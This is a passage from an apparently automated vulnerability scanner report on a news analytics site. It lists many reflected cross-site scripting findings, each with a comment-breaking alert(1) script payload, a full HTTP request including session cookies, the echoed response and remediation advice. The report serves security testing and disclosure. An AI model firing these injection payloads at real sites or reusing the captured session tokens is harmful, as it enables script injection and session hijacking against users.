HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:31 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... F19aea57--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9b59d6056e2%2FNetwork-infrastructure%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19aea57--><script>alert(1)</script>9b59d6056e2/Network-infrastructure/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 962ea--><script>alert(1)</script>d1972443112 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:38 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:38 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cture962ea--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ed1972443112%2FNetwork-infrastructure.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure962ea--><script>alert(1)</script>d1972443112/Network-infrastructure.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 40573--><script>alert(1)</script>b96df8e6712 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:48 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:48 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45955
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... re.html40573--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eb96df8e6712&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html40573--><script>alert(1)</script>b96df8e6712"> ...[SNIP]...
3.90. http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 4df2a--><script>alert(1)</script>bb132b834aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3F4df2a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebb132b834aa%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/19/Network-infrastructure/Network-infrastructure.html?4df2a--><script>alert(1)</script>bb132b834aa=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload fa9da--><script>alert(1)</script>6bac0ed8397 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:16 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:17 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... m%2Fmenufa9da--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E6bac0ed8397%2F2%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menufa9da--><script>alert(1)</script>6bac0ed8397/2/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload fcfd3--><script>alert(1)</script>e7060e8fad5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:30 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:31 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 2Fmenu%2F2fcfd3--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee7060e8fad5%2FBusiness-continuity%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2fcfd3--><script>alert(1)</script>e7060e8fad5/Business-continuity/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 9ca2d--><script>alert(1)</script>e052c9eff64 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:52 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:52 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... s-continuity9ca2d--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee052c9eff64%2FBusiness-continuity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity9ca2d--><script>alert(1)</script>e052c9eff64/Business-continuity.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload 75b36--><script>alert(1)</script>06300418583 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:42:05 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:42:05 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45941
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... ontinuity.html75b36--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E06300418583&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html75b36--><script>alert(1)</script>06300418583"> ...[SNIP]...
3.95. http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 2e793--><script>alert(1)</script>2cc393b4e14 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... y.html%3F2e793--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2cc393b4e14%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/2/Business-continuity/Business-continuity.html?2e793--><script>alert(1)</script>2cc393b4e14=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 9f503--><script>alert(1)</script>6ba192a2efa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... 3Cscript%3Ealert%281%29%3C%2Fscript%3E6ba192a2efa%2F20%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu9f503--><script>alert(1)</script>6ba192a2efa/20/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2af97--><script>alert(1)</script>2b34991a0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:15 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:15 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... E%3Cscript%3Ealert%281%29%3C%2Fscript%3E2b34991a0a3%2FNetwork-and-systems-management%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/202af97--><script>alert(1)</script>2b34991a0a3/Network-and-systems-management/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into an HTML comment. The payload 49eb2--><script>alert(1)</script>3dbbea7fb8e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-management.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:27 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:27 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E3dbbea7fb8e%2FNetwork-systems-management.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/20/Network-and-systems-management49eb2--><script>alert(1)</script>3dbbea7fb8e/Network-systems-management.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into an HTML comment. The payload b6e88--><script>alert(1)</script>23a19effe18 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management/Network-systems-management.htmlb6e88--><script>alert(1)</script>23a19effe18 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:39 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:39 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45979
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... --%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E23a19effe18&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.htmlb6e88--><script>alert(1)</script>23a19effe18"> ...[SNIP]...
3.100. http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 13ba0--><script>alert(1)</script>7d3b721c276 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu/20/Network-and-systems-management/Network-systems-management.html?13ba0--><script>alert(1)</script>7d3b721c276=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3Cscript%3Ealert%281%29%3C%2Fscript%3E7d3b721c276%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu/20/Network-and-systems-management/Network-systems-management.html?13ba0--><script>alert(1)</script>7d3b721c276=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 76dbc--><script>alert(1)</script>0f469ebcbb1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /menu76dbc--><script>alert(1)</script>0f469ebcbb1/21/Security/Security.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:45:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:45:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45899
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... cs.informationweek.com%2Fmenu76dbc--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0f469ebcbb1%2F21%2FSecurity%2FSecurity.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/menu76dbc--><script>alert(1)</script>0f469ebcbb1/21/Security/Security.html"> ...[SNIP]...
